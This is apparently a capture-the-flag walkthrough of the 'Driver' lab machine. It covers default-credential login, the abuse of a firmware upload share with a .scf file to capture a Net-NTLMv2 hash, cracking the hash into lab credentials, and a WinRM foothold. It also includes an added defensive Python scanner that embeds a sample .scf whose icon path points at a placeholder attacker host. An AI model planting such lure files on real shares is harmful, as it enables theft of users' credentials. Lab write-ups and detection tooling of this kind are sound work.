80
Visiting the site first requires basic authentication. I tried my luck with admin:admin and got access.

I can see the host at the bottom, which is driver.htb, so I put it in my /etc/hosts. It makes sense to run vhost fuzzing, but that didn't get anything.
Directory Fuzzing
We could also run it with the Authorization header, but that doesn't give us anything new.
Going to Firmware Updates takes us to the fw_up.php page.

Here is a very important message saying: 'Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.'
So whatever we upload goes to a file share.
Checking the upload function with Burp Suite shows that it makes a POST request with Content-Type: multipart/form-data.
I got stuck here so had to look at walkthroughs.
A classic attack, when we have the ability to write files into a share, is to drop a .scf file that references an icon file on an SMB share on the attacker's machine: 'If the folder containing the .scf file is opened with File Explorer, the .scf will inspire Explorer to connect back to get that icon file, and offer Net-NTLMv2 auth negotiation.' We can then crack this hash to hopefully get credentials.
The format for the .scf file is
The .scf file
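As an added defender-side example (not part of the original writeup): a small Python scanner that parses .scf files on a share and flags any whose IconFile points at a UNC host that is not on an allow-list, which is exactly the indicator this technique leaves on the file share. The sample .scf, the 10.10.14.99 address and the trusted host name are constructed placeholders.

```python
import os
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

# Constructed sample (not from the box): an .scf whose IconFile is a UNC path to an
# untrusted host (placeholder IP). That remote icon is what makes Explorer reach out.
SAMPLE_SCF = "[Shell]\nCommand=2\nIconFile=\\\\10.10.14.99\\share\\icon.ico\n[Taskbar]\nCommand=ToggleDesktop\n"

# Matches "\\host\..." and captures the host part of a UNC path.
UNC_HOST = re.compile(r"^\\\\([^\\]+)\\")


def parse_scf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the INI-like .scf layout into {section: {key: value}} (names lowercased)."""
    sections: Dict[str, Dict[str, str]] = {}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
        elif "=" in line:
            key, value = line.split("=", 1)
            sections.setdefault(current, {})[key.strip().lower()] = value.strip()
    return sections


def remote_icon_host(text: str) -> Optional[str]:
    """Return the host named in a UNC IconFile entry, or None if the icon is a local path."""
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    match = UNC_HOST.match(icon)
    return match.group(1).lower() if match else None


def scan_share(root: Path, trusted_hosts: set) -> List[dict]:
    """Walk a share and report .scf files whose icon would be fetched from an untrusted host."""
    findings = []
    for path in root.rglob("*.scf"):
        host = remote_icon_host(path.read_text(errors="replace"))
        if host and host not in trusted_hosts:
            rel = str(path.relative_to(root)).replace(os.sep, "/")
            findings.append({"file": rel, "host": host})
    return findings


def demo() -> List[dict]:
    """Build a throwaway share with one benign and one suspicious .scf, then scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "uploads").mkdir()
        (root / "uploads" / "firmware.scf").write_text(SAMPLE_SCF)
        # Benign: icon taken from a local binary, no network access involved.
        (root / "desktop.scf").write_text("[Shell]\nCommand=2\nIconFile=C:\\Windows\\explorer.exe,3\n")
        return scan_share(root, trusted_hosts={"fileserver.local"})  # placeholder allow-list


if __name__ == "__main__":
    for finding in demo():
        print(f"SUSPICIOUS {finding['file']} -> icon served from {finding['host']}")
```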
We receive a hash.
Cracking it with hashcat gives us our first pair of credentials: tony:liltony
Our nmap scan showed WinRM open, so I try the credentials and get a foothold. That was easy, hmm.